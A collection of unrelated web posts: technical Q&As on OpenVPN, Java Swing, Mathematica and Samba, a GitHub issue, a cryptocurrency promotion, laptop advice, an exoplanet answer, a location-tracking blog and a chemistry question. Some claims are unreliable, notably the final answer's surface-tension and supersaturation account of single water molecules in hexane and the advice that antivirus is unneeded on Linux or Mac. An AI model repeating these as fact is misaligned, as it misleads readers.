push "redirect-gateway"

Code: Select all

client
remote 220.127.116.11
cipher AES-256-CBC
comp-lzo yes
dev tun
proto udp
nobind
auth-nocache
script-security 2
persist-key
persist-tun
user nobody
group nobody
link-mtu 1602
auth SHA512
keysize 256
keepalive 600 1800

This setting is honored by regular Linux OpenVPN clients, but not by OpenVPN Connect on Android, although the log says it is. Here's a summary of events seen from the client (see pictures below for details - I don't know how to save the log as a text file):

19:55:46 OpenVPN start / unused option keepalive (I've put this in the client config, but it is apparently not used.)
19:55:49-54 Verify/TLS stuff
19:55:55 Sending PUSH_REQUEST, replied with ping=600, ping-restart=1800 (looks good!)
19:59:21 "Session invalidated: KEEPALIVE_TIMEOUT" & Disconnected. <-- what? only 210 seconds have passed!

Server version: 2.1.3 x86_64-pc-linux-gnu (Debian version 2.1.3-2+squeeze1)
Client version: 1.1.12 build 45 (OpenVPN Connect from Google Play)
Android version: 4.2.2 (Paranoid Android 3.69)

How can I prevent OpenVPN from disconnecting on inactivity when I have configured the keepalive appropriately?
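For reference, keepalive is a helper directive: keepalive n m expands to ping n and ping-restart, and in server mode the values are pushed to connecting clients. That matches both the "unused option keepalive" line in the client log and the pushed ping=600/ping-restart=1800. One thing worth trying (a sketch, not a confirmed fix for OpenVPN Connect's timeout behavior) is to set the underlying directives explicitly in the client config instead of keepalive:

```text
# client side: "keepalive" itself is ignored here ("unused option
# keepalive" in the log), but the directives it expands to are valid
# in a client config
ping 600          # send a ping after 600 s of send/receive silence
ping-restart 1800 # restart if no packet received for 1800 s
```

Whether OpenVPN Connect honors locally configured values differently from the pushed ones is an open question; the observed disconnect after ~210 s suggests the app may be applying its own timeout regardless.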
ImageIcon doesn't show up on top left app window I have this code: public DesktopApplication1View(SingleFrameApplication app) { super(app); pbu.registriere(this); ImageIcon icon = new ImageIcon("resources/BilKa_Icon_32.png"); this.getFrame().setIconImage(icon.getImage()); initComponents(); } I'm wondering why the image icon doesn't show up on the top left of the app window. It's still the Java cup of coffee logo instead. What might be wrong? Is icon.getImageLoadStatus() == MediaTracker.COMPLETE? Your question might be a duplicate of: http://stackoverflow.com/questions/7194734/setting-application-icon-in-swing Not really, because in this case I have nothing to do with JFrame. I tried that; it does not work either. I don't know where the problem is, but maybe one of the authors of this framework will look here and give us an answer :-) this.getFrame() is returning either an instance of Frame or JFrame. You described your question as being Swing in both the title and tags, so it is not an unreasonable assumption that your frame is a JFrame rather than an AWT Frame. One likely possibility is that your resource path is incorrect. Depending on what your file hierarchy looks like, whether your class files are in a jar, etc., you might need a "/" at the beginning of the path, before the resources directory, to make the path absolute instead of relative. Tutorial: http://download.oracle.com/javase/1.5.0/docs/guide/lang/resources.html If you are fairly confident you are reading the image correctly (a good test would be to make a dummy component inside your window and see whether you can load the image into that), you should look into following through the Frame/Top Level Window tutorial, particularly the parts about window decorations.
In particular, one thing you may not be doing (I can't tell from your snippet) is that it appears you might need to set JFrame.setDefaultLookAndFeelDecorated(true); before the frame is created...which you would not be able to do using this.getFrame(), but need to do somewhere earlier in your initialization code. Everything seems correct, including the resource path, because on another box I set an image from the same folder (resources) and I use the same code. Are you on a case-sensitive OS? I do notice you have capital letters in your image filename. JFrame frame = new JFrame("FrameDemo"); frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); JLabel emptyLabel = new JLabel(""); emptyLabel.setPreferredSize(new Dimension(175, 100)); frame.getContentPane().add(emptyLabel, BorderLayout.CENTER); frame.setIconImage(new ImageIcon("/resources/BilKa_Icon_32.png").getImage()); I have put those inside the class, and a new window popped up, but the icon of the new window didn't change either. Did you test the demo project from the window tutorial? Does it work for you? It works for me on my machine. If it works, that narrows down the problem to something in your code, vs. window decorations not working on your OS/Java version/etc. The source code is linked from that tutorial; you just need to create the package (and optionally add a jpg) and compile/run: http://download.oracle.com/javase/tutorial/displayCode.html?code=http://download.oracle.com/javase/tutorial/uiswing/examples/components/FrameDemo2Project/src/components/FrameDemo2.java Mike K is right, ImageIcons can be loaded dynamically, and images can have a zero size when they are first initialised. Also note that in Unix and in a JAR, the names are case sensitive.
try this:

    try {
        ImageIcon icon = new ImageIcon("resources/BilKa_Icon_32.png");
        // MediaTracker needs a Component; the app's frame works here
        MediaTracker mt = new MediaTracker(this.getFrame());
        // the second argument is an arbitrary tracking ID
        mt.addImage(icon.getImage(), 0);
        mt.waitForAll();
        this.getFrame().setIconImage(icon.getImage());
    } catch (InterruptedException excp) {}

-- OK, apologies, I have edited the addImage call - it takes an extra ID parameter, which can be any number. As to your error "no such constructor": it is telling you that you need to pass a Component to the constructor. Your app window is a component, so you should pass that here as a parameter. I used this because most people put this code inside a class that extends Frame, Window or JFrame. So use MediaTracker mt = new MediaTracker(this.getFrame()); I got this error: The constructor MediaTracker(DesktopApplication1View) is undefined. And I need one more parameter for mt.addImage.
Delay of event detection dependent on "MouseDown" position Let's say we have a Rectangle with color which depends on CurrentValue["MouseOver"]: Deploy@Framed@Graphics[ Dynamic @ {If[CurrentValue["MouseOver"], Red, Green], Rectangle[]} , ImagePadding -> 10] With the cursor over the Rectangle[] the color switches to Red as expected; also if one puts the "MouseDown" and drags it around it is still Red. However, if you put the "MouseDown" outside the rectangle, on the padded area, and drag it to the rectangle, it will not switch the color till "MouseUp". Is there any way to avoid such behaviour in general? I can create some workarounds for particular situations but I'm looking for a general solution. I was thinking about EventHandler's PassEvents options but it seems it is a deeper problem (I've failed with this approach :)). It looks like the problem is that the "MouseDown" event is blocking some functions, for example: Dynamic@CurrentValue["ControlKey"] is not working while the mouse button is down. I've faced it before with MouseAppearance: Problem MouseAppearance updating while "MouseDown" It doesn't switch until MouseMoved after MouseUp. It's as if MouseMoved and MouseDragged are mutually exclusive, and MouseOver is only updated on MouseMoved? @TimothyWofford I do not see this; only MouseUp is enough for the switch in my case, maybe it's OS dependent? It seems rather that MouseDown is blocking some event detection, try: Dynamic@CurrentValue["ControlKey"] and press Ctrl when the mouse is down. @Kuba I believe that dynamic interactivity in general is halted during mouse down, at least that has always been my experience (with slider interactions and such being excluded). For instance try DynamicWrapper[ Dynamic[t], Refresh[t = AbsoluteTime[], UpdateInterval -> 0.1] ], and press the mouse button. Original (incorrect) answer When you press in the white area and drag into the green square, you begin a selection just like when you select objects for copy-paste operations.
The workaround I propose is to prevent the selection process to begin in the first place. First way: Create the cell with the option Selectable -> False CellPrint@Cell[BoxData[ToBoxes@ Deploy@Framed@Graphics[ Dynamic@{If[CurrentValue["MouseOver"], Red, Green], Rectangle[]}, ImagePadding -> 10] ], Selectable -> False] Second way: If the cell is already created, press Ctrl+Shift+E and edit the cell options to include Selectable -> False, press Ctrl+Shift+E again. Update The following code should produce the result you want: CellPrint@Cell[BoxData[ToBoxes@ Framed@Graphics[ Dynamic@{If[CurrentValue["MouseOver"], Red, Green], Rectangle[]}, ImagePadding -> 10] ], Selectable -> False] Mmm ... it works only if you begin from outside the padded area. So, the above is not an answer, yet. I have updated the answer. @Hector now it works :) thanks, it seems Deploy is messing around a little. @Kuba: the strange thing is that Deploy is supposed to disable selection. @Kuba: I think the problem is that ContentSelectable -> False does not change the properties of the frame. @Hector It seems it is really what it is all about. It even helps with DynamicWrapper[ Dynamic[t], Refresh[t = AbsoluteTime[], UpdateInterval -> 0.1] ]
By Gardalkis - 17.04.2020 As part of its plans to make Africa a more integrated continent, leaders of the Economic Community of West African States (ECOWAS) have decided that the region is set to get a long-discussed new currency: the Eco. Many Africans are pleased — but there is a lot of work ahead. How can we design a cryptocurrency for the better of humanity and ecology? In this last chapter of the crypto deep dive series, we will dissect two kinds of blockchain cryptocurrencies that are currently making waves on the internet and beyond. Finally, we present the basics of the ECO Coin framework that intends to bring humans a democratic system - with trees - into this sustainable, communal cryptocurrency. Blockchain technology has only been around for ten years. It was only in 2008 when Satoshi Nakamoto released the Bitcoin white paper. To put it in perspective: this means that cryptocurrency technology is about as old as the first iPhone. However, in these ten years Bitcoin, Ethereum and other cryptocurrency technologies have changed the way in which we look at money. Traditional money is always bound to either national or supranational organs that have a rigidly structured political and legal framework. However, in the blockchain world, these legal and political frameworks are way less elaborate or sometimes even non-existent. The sheer possibility of having money that is ungovernable and often not taxable is a seismic shift in terms of monetary development. All of that has happened in the course of ten years. A promising start, leaving us wondering: what may be coming in the future? That blockchain system is simply not built yet, but ECO coin is making steps towards building it.
Luckily for ECO coin, we are not the only ones to pursue sustainable blockchain technology. We have peers and potential partners that we can learn from: projects that are developing their own platforms in the same, bottom-up way that ECO coin is trying to do. In this final story in the crypto deep dive series, we will explore two examples of currencies that the ECO coin is drawing inspiration from, and we explore the framework of the soon-to-be-used ECO coin. Tokens: a digital representation of human data Besides cryptocurrency money there are also cryptographic tokens. In this world, a world that is not focused on big money and system-wide revolution, there are many interesting things happening that ECO coin can learn from. Cryptographic tokens are a form of digital payment currency that can resemble any real-world asset and anything that generates more data or money on behalf of the token holder. Interest or dividends earned can be tokenized and subsequently shared as well. The person holding the tokens will automatically receive all interests and dividends connected to it. So how do these tokens work on the practical level? The word nest egg has the connotation of a sum of money that is saved for the future. In essence, NestEgg is a platform that aims to build sustainable energy infrastructure without direct involvement from governments or real estate investors. Users put money into the platform, which NestEgg uses to build infrastructure like, for example, a windmill, and in return users get a cryptographic token which is their proof of having invested in the infrastructure. Users can claim returns through the NestEgg platform after the infrastructure project is built. NestEgg, in essence, is a way to democratise pension investment.
When young people invest into it now, they have a way of saving up for their own retirement, fully outside of traditional pension funds. We should be looking to integrate these tokens for things that are not articulated within our current, dominant economic framework of fiat money. The most applicable articulation of this research is, of course, ecological value. ECO coin was majorly inspired by this approach of using digital currencies for investing into your own pension (read: the far future). In a way, you can compare an investment into the ECO coin platform to an investment into the future. People will also begin believing in the future again, where we can live together with both our ecosphere and technosphere in a great symbiosis. Money: better when spent Another inspiring example, this time in the category of money, is the FreiCoin project. So why is that a good and inspiring thing? The project uses the concept of a demurrage fee, which in the days of physical money was a kind of service fee that you would pay to the banker who stores and safeguards your gold. A service fee, if you will. In the FreiCoin project, however, demurrage fees are actively implemented to make it less attractive to hold an amount of FreiCoin for a long period of time, and more attractive to spend your money. As such, currencies that decay in value - currencies with a very high deflation rate - have the possibility of leveling out the economic field when they are adopted on a large scale. Those investments would benefit everyone in that system, instead of just the capital holders. These are the kinds of solutions that are worth looking at in the span of a few years.
Therefore the ECO coin has chosen to adopt this structural incentive of a demurrage fee, to incentivize users to spend their coins at partners as quickly as possible instead of doing the hodl that many crypto investors do. The future of the ECO Coin Making this technology more rooted in nature: the value of ECOs represents the decaying value of trees, since trees mature and die over time. The framework of the ecocoin So how are we going to use cryptocurrency technology for the better of humanity? The eco coin will be an investment in humanity's future, generating ecological dividends over time. Within the framework of the ECO coin, which will be alive within the blockchain world of the years to come, we also aim to change the root of blockchain technology to include humans into the equation, as well as ethics. ECO inspectors literally keep the blockchain afloat by verifying that sustainable actions took place, introducing and training new ECO inspectors and managing the escrowed trees by confirming that these trees are still standing at the given location. In addition, giving this task to humans, instead of to computer power, may prove to make this currency less energy intensive. Moreover, governance and self-regulation are a big problem in current blockchain networks as well as a big question for regulating bodies. The ECO coin is making people work towards the same collective goal of doing more sustainable actions and treating the planet well. The regulating body, the ECO coin team, can only point in the direction of a solution, but it is building systems that outsource decision-making on the environmental questions and uncertainties towards its community of users. A Decentralised Autonomous Charity, a digital agora. We are working on the voting system as we speak and users will be able to vote in the app quite easily.
All together, the ECO coin team, the ECO inspectors, and the voting community will work towards a system where ECO coins can only be spent on sustainable products, thereby changing our consumption habits. Therefore, a thorough dive into the supply chain and production methods of the companies we want to partner with is needed, in order to verify that they are, indeed, selling good, sustainable produce that should be exchangeable for ECO coins. Because the blockchain will be public and vendors are identified, funding bad ideas using ECO coins will be nearly impossible to do. And this is also strongly de-incentivised by the network as a whole, as ECO coins can only be spent at certified vendors. Nature is to be hard-wired into our technology On top of that, any ECO coin is not just a superficial number on a blockchain, but it stands for an actual, living tree somewhere in the world. As such, the network is literally pegged to real-world trees, which back this new cryptocurrency with something that has tangible value. The ECO coin trees are the physical representations of the digital network. With the ECO coin, a part of our ecology - trees - will be hard-wired into the technological world of the future. That is a tribute to Nature, pur sang. This was the last story of the crypto deep dive series, in which we immersed ourselves into the crypto world to explore the possibilities for the ECO coin. Want to learn more? Visit the ECO Coin website, where we will soon publish the technical paper. Enjoying this story? Show it to us!
Unable to retrieve artifacts where the version is not embedded in the artifact name This snippet works when pulling jaxxstorm/connecti but not another private project. Seems to be the lack of the version/tag embedded in the artifact name. (owner and repo redacted as I'm not sure of the privacy issues) ##[debug]Loading env Run<EMAIL_ADDRESS> searching for REPO_darwin_amd64 with linux.(x64|amd64).*.(tar.gz|zip) searching for REPO_darwin_arm64 with linux.(x64|amd64).*.(tar.gz|zip) searching for REPO_linux_386 with linux.(x64|amd64).*.(tar.gz|zip) searching for REPO_linux_amd64 with linux.(x64|amd64).*.(tar.gz|zip) searching for REPO_linux_arm64 with linux.(x64|amd64).*.(tar.gz|zip) searching for REPO_windows_386.exe with linux.(x64|amd64).*.(tar.gz|zip) searching for REPO_windows_amd64.exe with linux.(x64|amd64).*.(tar.gz|zip) Error: Could not find a release for v0.1.1. Found: REPO_darwin_amd64,REPO_darwin_arm64,REPO_linux_386,REPO_linux_amd64,REPO_linux_arm64,REPO_windows_386.exe,REPO_windows_amd64.exe ##[debug]Node Action run completed with exit code 1 ##[debug]Finishing: Download REPO binary Using jaxxstorm/connecti as a working template, I can see the version info using: [I] ➜ gh --repo jaxxstorm/connecti release view v0.0.3 v0.0.3 jaxxstorm released this about 1 day ago Assets connecti-v0.0.3-darwin-amd64.tar.gz 25.19 MiB connecti-v0.0.3-darwin-arm64.tar.gz 25.26 MiB connecti-v0.0.3-linux-amd64.tar.gz 25.35 MiB connecti-v0.0.3-linux-arm64.tar.gz 24.21 MiB connecti-v0.0.3-windows-amd64.zip 25.56 MiB connecti-v0.0.3-windows-arm64.zip 24.48 MiB connecti_0.0.3_checksums.txt 606 B View on GitHub: https://github.com/jaxxstorm/connecti/releases/tag/v0.0.3 There's a private repo I'm trying to pull a release artifacts for that has multiple releases: [I] ➜ gh --repo OWNER/REPO release list v0.1.1 Latest v0.1.1 2022-12-01T17:57:45Z v0.1.0 v0.1.0 2022-06-01T23:38:43Z v0.0.26 v0.0.26 2022-05-23T09:56:44Z v0.0.25 v0.0.25 2022-02-23T19:57:25Z v0.0.24 v0.0.24 
2022-01-12T11:50:10Z v0.0.23 v0.0.23 2021-12-17T19:02:41Z v0.0.22 v0.0.22 2021-12-09T12:56:35Z v0.0.21 v0.0.21 2021-11-10T13:52:44Z v0.0.20 v0.0.20 2021-11-09T11:46:10Z v0.0.19 v0.0.19 2021-10-07T11:35:22Z v0.0.18 v0.0.18 2021-09-22T11:32:07Z v0.0.17 v0.0.17 2021-08-19T11:44:02Z v0.0.16 v0.0.16 2021-03-29T08:53:32Z v0.0.15 v0.0.15 2021-03-25T09:32:00Z v0.0.14 v0.0.14 2021-03-23T13:53:21Z v0.0.13 v0.0.13 2021-03-18T16:00:18Z v0.0.12 v0.0.12 2021-03-09T11:49:04Z v0.0.11 v0.0.11 2021-02-16T14:03:35Z v0.0.10 v0.0.10 2021-02-10T13:05:03Z v0.0.9 v0.0.9 2021-02-05T11:20:02Z v0.0.8 v0.0.8 2021-02-04T13:55:45Z v0.0.7 v0.0.7 2021-01-29T19:30:22Z v0.0.6 v0.0.6 2021-01-29T17:18:05Z v0.0.5 v0.0.5 2021-01-27T11:24:17Z v0.0.4 v0.0.4 2021-01-21T12:31:32Z v0.0.3 v0.0.3 2021-01-21T09:15:10Z v0.0.2 v0.0.2 2021-01-19T18:13:43Z v0.0.1 v0.0.1 2021-01-16T01:37:00Z From which I can query individual repos, but the releases don't embed the name: [I] ➜ gh --repo OWNER/REPO release view v0.1.1 title: v0.1.1 tag: v0.1.1 draft: false prerelease: false author: XXXX created: 2022-12-01T17:56:53Z published: 2022-12-01T17:57:45Z url: https://github.com/OWNER/REPO/releases/tag/v0.1.1 asset: REPO_darwin_amd64 asset: REPO_darwin_arm64 asset: REPO_linux_386 asset: REPO_linux_amd64 asset: REPO_linux_arm64 asset: REPO_windows_386.exe asset: REPO_windows_amd64.exe -- **Full Changelog**: https://github.com/OWNER/REPO/compare/v0.1.0...v0.1.1 I believe this is solved as of the latest version, can you try updating? I apologize, but I can't confirm as I'm no longer using this action. I switched to using: gh --repo <owner/repo> release download --pattern "linux_amd64" ${{ env.XXX_VERSION }} If it's supported now, I would just close it.
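The failure mode can be reproduced outside the action. The search pattern shown in the debug log, `linux.(x64|amd64).*.(tar.gz|zip)`, requires an archive extension after the platform token, so extension-less binaries like `REPO_linux_amd64` can never match, while connecti-style names with the version and a `.tar.gz`/`.zip` suffix do. A minimal sketch:

```python
import re

# Pattern copied verbatim from the action's debug log.
pattern = re.compile(r"linux.(x64|amd64).*.(tar.gz|zip)")

# Asset names with an archive extension match...
assert pattern.search("connecti-v0.0.3-linux-amd64.tar.gz") is not None

# ...but bare, extension-less assets, as produced by the private repo, do not.
assert pattern.search("REPO_linux_amd64") is None
assert pattern.search("REPO_linux_386") is None
```

This is consistent with the workaround mentioned below of using `gh release download --pattern "linux_amd64"`, whose pattern does not demand an extension.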
A friend recently asked me what laptop to get after his had died (fortunately no data was lost – clever man!). His question was really “Windows or Mac”? The requirements were photos, email, music, Office. It is an oft asked question, so I thought I would post my reply. How old is the laptop? I ask because there are three possibilities to consider, based on available finances. - The cheapest option is to keep the laptop and install Ubuntu on it. They are about to release the Disco Dingo (next week), though you can install Cosmic Cuttlefish (current release) now and then upgrade. Of course, it is a new environment to learn, but the benefits are: - It is a free option, and Ubuntu comes with all the software you need, along with regular free updates - Ubuntu works nicely on lower powered hardware, and you can even have versions that will work on really really old hardware (e.g. ½ gig RAM) - You won’t need a new laptop, though depending on the problem that occurred you might want to replace the hard disk - You can install Ubuntu on a memory stick and then boot from that to try before you install - Ubuntu has become much easier to use and more stable over the years, and now looks pretty great - Personally I don’t think you need to bother with AV. I know purists will say that you always need AV, but Linux is inherently more secure and I have never had a problem with viruses on Linux - The mid range option is to buy a new Windows laptop. Personally I don’t like Windows. You would then need to ensure you have the correct Office licenses installed (unless, of course, you opt for a free office solution such as Libre Office, the one that comes with Ubuntu). You would also need to ensure the new laptop has a DVD player, or you have an external USB-enabled one: a lot of new laptops no longer have these.
- A familiar operating environment - I can’t think of another benefit, given the specific requirements you mentioned, unless you are after some esoteric piece of software that only works on Windows - The high end option is to buy a Macbook. This will be more expensive than Windows (unless you aim for a high end Windows machine, where prices are surprisingly similar). Macbooks do not come with DVD players so you would need to have software based files to play or an external DVD player. - I personally love the build quality, though some people do complain about the keyboard (since they are so thin, Apple changed the mechanism and this is not to everyone’s taste. Best try before you buy) - The OS is more stable than Windows - You won’t need to buy MS Office. You can, of course, but Apple’s Office system is supplied and is very good - Personally I don’t think you need to bother with AV. I know purists will say that you always need AV, but Unix is inherently more secure and I have never had a problem with viruses on my Macs
The questions and answers given in this section are designed to highlight important aspects of Microsoft Windows networking. What is the significance of the MIDEARTH<1b> type query? This is a broadcast announcement by which the Windows machine is attempting to locate a Domain Master Browser (DMB) in the event that it might exist on the network. Refer to TOSHARG2, Chapter 9, Section 9.7, "Technical Overview of Browsing," for details regarding the function of the DMB and its role in network browsing. What is the significance of the MIDEARTH<1d> type name registration? This name registration records the machine IP addresses of the LMBs. Network clients can query this name type to obtain a list of browser servers from the master browser. The LMB is responsible for monitoring all host announcements on the local network and for collating the information contained within them. Using this information, it can provide answers to other Windows network clients that request information such as: The list of machines known to the LMB (i.e., the browse list) The IP addresses of all domain controllers known for the domain The IP addresses of LMBs The IP address of the DMB (if one exists) The IP address of the LMB on the local segment What is the role and significance of the <01><02>__MSBROWSE__<02><01> name registration? This name is registered by the browse master to broadcast and receive domain announcements. Its scope is limited to the local network segment, or subnet. By querying this name type, master browsers on networks that have multiple domains can find the names of master browsers for each domain. What is the significance of the MIDEARTH<1e> type name registration? This name is registered by all browse masters in a domain or workgroup. The registration name type is known as the Browser Election Service. Master browsers register themselves with this name type so that DMBs can locate them to perform cross-subnet browse list updates.
This name type is also used to initiate elections for Master Browsers. What is the significance of the guest account in smb.conf? This parameter specifies the default UNIX account to which MS Windows networking NULL session connections are mapped. The default name for the UNIX account used for this mapping is called nobody. If the UNIX/Linux system that is hosting Samba does not have a nobody account and an alternate mapping has not been specified, network browsing will not work at all. It should be noted that the guest account is essential to Samba operation. Either the operating system must have an account called nobody or there must be an entry in the smb.conf file with a valid UNIX account, such as guest account = ftp. Is it possible to reduce network broadcast activity with Samba-3? Yes, there are two ways to do this. The first involves use of WINS (see TOSHARG2, Chapter 9, Section 9.5, "WINS: The Windows Inter-networking Name Server"); the alternate method involves disabling the use of NetBIOS over TCP/IP. This second method requires a correctly configured DNS server (see TOSHARG2, Chapter 9, Section 9.3, "Discussion"). The use of WINS reduces network broadcast traffic. The reduction is greatest when all network clients are configured to operate in Hybrid Mode. This can be effected through use of DHCP to set the NetBIOS node type to type 8 for all network clients. Additionally, it is beneficial to configure Samba to use name resolve order = wins host bcast. Use of SMB without NetBIOS is possible only on Windows 200x/XP Professional clients and servers, as well as with Samba-3. Can I just use plain-text passwords with Samba? Yes, you can configure Samba to use plain-text passwords, though this does create a few problems. First, the use of /etc/passwd-based plain-text passwords requires that registry modifications be made on all MS Windows client machines to enable plain-text password support.
This significantly diminishes the security of MS Windows client operation. Many network administrators are bitterly opposed to doing this. Second, Microsoft has not maintained plain-text password support since the default setting disabling it was introduced. When network connections are dropped by the client, it is not possible to re-establish the connection automatically; users need to log off and then log on again. Plain-text password support may interfere with recent enhancements that are part of the Microsoft move toward a more secure computing environment. Samba-3 supports Microsoft encrypted passwords. Be advised not to reintroduce plain-text password handling. Instead, just create user accounts by running smbpasswd -a 'username'. It is not possible to add a user to the passdb backend database unless there is a UNIX system account for that user. On systems that run winbindd to access the Samba PDC/BDC to provide Windows user and group accounts, the idmap uid and idmap gid ranges set in the smb.conf file provide the local UID/GIDs needed for local identity management purposes. What parameter in the smb.conf file is used to enable the use of encrypted passwords? The parameter in the smb.conf file that controls this behavior is known as encrypt passwords. The default setting for this in Samba-3 is Yes (Enabled). Is it necessary to specify encrypt passwords = Yes when Samba-3 is configured as a domain member? No. This is the default behavior. Is it necessary to specify a guest account when Samba-3 is configured as a domain member server? Yes. This is a local function on the server. The default setting is to use the UNIX account nobody. If this account does not exist on the UNIX server, then it is necessary to provide a guest account = an_account, where an_account is a valid local UNIX user account.
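Pulling the parameters from these answers together, a minimal smb.conf [global] fragment might look like the sketch below. The workgroup name comes from the examples above; the guest account is only valid if that UNIX account actually exists on your system, and the WINS server address is purely illustrative.

```
[global]
   workgroup = MIDEARTH
   # map NULL session connections to a valid local account;
   # 'ftp' is only an example - 'nobody' is the default
   guest account = ftp
   # default in Samba-3, shown here for clarity
   encrypt passwords = Yes
   # prefer WINS to cut broadcast traffic
   name resolve order = wins host bcast
   # illustrative address of the WINS server
   wins server = 192.168.1.1
```

Run testparm after editing to confirm the file parses cleanly.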
Are there many single transits in the Kepler data, which might be exoplanets with a longer orbital period than the time they have been observed for transits? Can any conclusions be drawn about how common they are? Is there reason to believe that the outer solar system is a common configuration? I suppose that slow moving planets are hard to detect also with doppler measurements. Will the upcoming telescopes aimed at nearby stars be able to find 10+ AU orbital radius planets? There are many planets known which have orbits longer than the longest exoplanet orbital periods found by Kepler. These planets were discovered using the "doppler wobble" or radial velocity technique. The plot below (a few months out of date now) shows many planets orbiting with similar periods to Mars and Jupiter. The red points were discovered by transits (including Kepler planets), whilst the green were discovered by the doppler technique. The sensitivity of current observational doppler techniques (shown by the blue line) means that so long as we observe for a sufficiently long time (decades, in order to see an oscillation in the radial velocity), we will be able to detect Jupiter-like (or even a bit lower-mass) planets out to much longer periods. The frequency of planets in wider orbits is also probed well by surveys for gravitational microlensing. Single transit events cannot be securely identified as being caused by planets. I think there are a number of other possible causes, both astronomical and instrumental, that might also be to blame. Nevertheless I'm sure somebody will analyse these in some statistical way at some point to draw some inferences, but at the moment, the securest data are from the radial velocity technique. These show that the solar system is not necessarily unusual at all - there are plenty of stars that have Jupiter-sized objects in Jupiter-sized orbits. According to the review by Howard et al.
(2013), from radial velocity surveys, about 10 per cent of G/K stars have a 0.3-10 Jupiter-mass planet in orbit between 0.03 and 3 au from the parent star and around 7% have a Jupiter-sized planet orbiting between 3 and 20 au. This latter number probably has a significant error bar at the moment, but it is consistent with the information from microlensing surveys (e.g. Gould et al. 2010). This latter paper has an interesting statistic in the abstract. They say that if all stars had a solar system like ours, they would have detected 18.2 "events" - 11.4 due to Jupiters, 6.4 due to Saturns and 0.5 Uranus/Neptunes; they would also have detected 6 "two-planet" events. In actual fact they detected 6 events, one of which was a two-planet event, and thus conclude that a broad-brush figure for the frequency of "solar system occurrence" is 1/6. I know of two groups working on counting the number of long-period Jupiters in Kepler data (based on finding one transit only), but I haven't seen any results yet. Radial velocities are the best way to answer your question because of the much longer timebase of observations.
OPCFW_CODE
Just like every other Bob Dylan fan in the world, I have been endeavoring to determine exactly how many roads a man must walk down. To this end, I’ve been using passive location tracking for a few years now and have generated a fairly significant amount of data on my movements and travel. Mostly I’ve used Google Latitude, and enabled its optional history feature. Many people shudder at the privacy implications of this. Personally, I assume my cell phone providers have very similar data on hand already, if not with quite as much accuracy and precision. I’ve now started looking through the data to see how my movements have changed over time. One really stark difference between living in Seattle and living in Stockholm is my average furthest distance — on any given day how many miles away from home do I make it? Check it out. This is a map of my movements in Seattle on Thursday, September 29, 2011: That was a fairly normal Thursday on which I went downtown for work, went back home, and then went out for drinks on Capitol Hill. One cool thing about having this data is that it helps spark your memory — I now remember that exact evening, who I was with, and some of the conversations that we were having. Location is an excellent trigger for that sort of thing. Anyway, you can see that the furthest I made it from home is 4.3 miles. Most of my days in Seattle seem to have a furthest distance figure of 4 to 6 miles. Now, here’s a map of my movements in Stockholm on this Wednesday, September 26, 2012: Again, a fairly normal Wednesday. I walked to the office, went to a show after work, and then walked home. The difference, though, is that the furthest I made it from home is only 0.997 miles. One mile instead of five miles. That’s a pretty significant difference. What makes it especially interesting for me is that I lived pretty centrally in Seattle and had a very enviable commute (15 minutes on the bus followed by 5 minutes on a bike). The same holds in Stockholm.
I live fairly centrally and have a similarly short commute. But the difference is that in Stockholm a short commute is a 15-minute walk, rather than a 15-minute bus ride. This is the kind of thing you can enable when you build for density, and it’s the kind of thing I hope to see become more possible in Seattle as well. Some caveats here: Neither of these days were climbing days for me, so I didn’t make it to the climbing gym. If I look at climbing days, my distance from home in Seattle is about 6 miles. In Stockholm it’s either 2 or 4 miles depending on which gym. That’s definitely a less pronounced difference, but I think the theme still holds. Some neighborhoods in Seattle are fairly dense. On my stereotypical lazy Sundays spent in and around Wallingford, I often didn’t make it even 2 miles from home. I could walk to restaurants, the coffee shop, the beer shop and the pub without going even half a mile. But unlike in Stockholm, that half a mile isn’t dense enough to have many offices where a software engineer might be able to find employment. Rather, I had to go downtown for work. While I have a bunch of data points about myself and my movements, this whole thing is — at its heart — quite anecdotal. I’m sure there are people in Seattle who don’t usually have to go more than a mile from home. And I know there are people in Stockholm who live further out and have to commute a few miles. Anyway, just some data that I thought was interesting.
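As a side note, the "furthest distance" figure is straightforward to compute from a day of tracked coordinates: take the great-circle distance from home to every point and keep the maximum. A minimal sketch in Python — the function names and the sample coordinates are made up for illustration, not taken from my actual data:

```python
import math

def haversine_miles(lat1, lon1, lat2, lon2):
    # great-circle distance between two (lat, lon) points, in miles
    r = 3958.8  # mean Earth radius in miles
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

def furthest_from_home(home, points):
    # maximum distance of any tracked point from home
    return max(haversine_miles(home[0], home[1], lat, lon) for lat, lon in points)

# hypothetical day of tracked points around central Seattle
home = (47.6097, -122.3331)
day = [(47.6097, -122.3331), (47.6205, -122.3493), (47.6566, -122.3130)]
print(round(furthest_from_home(home, day), 1))  # furthest point of the day, in miles
```

With real exported location history you would feed in the full day's point list instead of three hand-picked coordinates.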
OPCFW_CODE
What would happen if I mixed a single water molecule in a beaker of hexane? What would happen if I mixed a single water molecule in a beaker of hexane? Would it sink or float? How about 2 water molecules? 3? Etc? In other words, how many water molecules does it take to be hydrogen bonding together to become more dense than hexane? This is a clever question because the molecular weight of water is only 18.01528 g/mol while the molecular weight of hexane is 86.17536 g/mol. Naturally, you would expect the lower mass to rest on top, but water has a higher density... and we all know that water will sink! But there are other forces at work. So, supposing that you neglect the fact that one molecule of water would be in a vapor state, Google says the surface tension of hexane @ 20 °C is 18.43 mN/m... so placing the water molecule on top of the hexane would probably cause the molecule to float (like a feather on water). However, if you submerged the molecule it should dissolve (Google says that the solubility of water in hexane is 0.01% at 20 °C). Now, once the saturation point of hexane has been met, such that one more single molecule of water would cause a change to occur, that change would probably result in a condensation and precipitation of the dissolved water, because the reality is that the hexane will become super-saturated, such that the extra water molecule will cause many water molecules to fall out of solution. Understanding that you are transferring energy is key to understanding this. Consider pushing a ball over a hill: once the ball reaches the top and begins to fall, it falls into the valley. Once you push a boat past its tipping point, it sinks to the bottom.
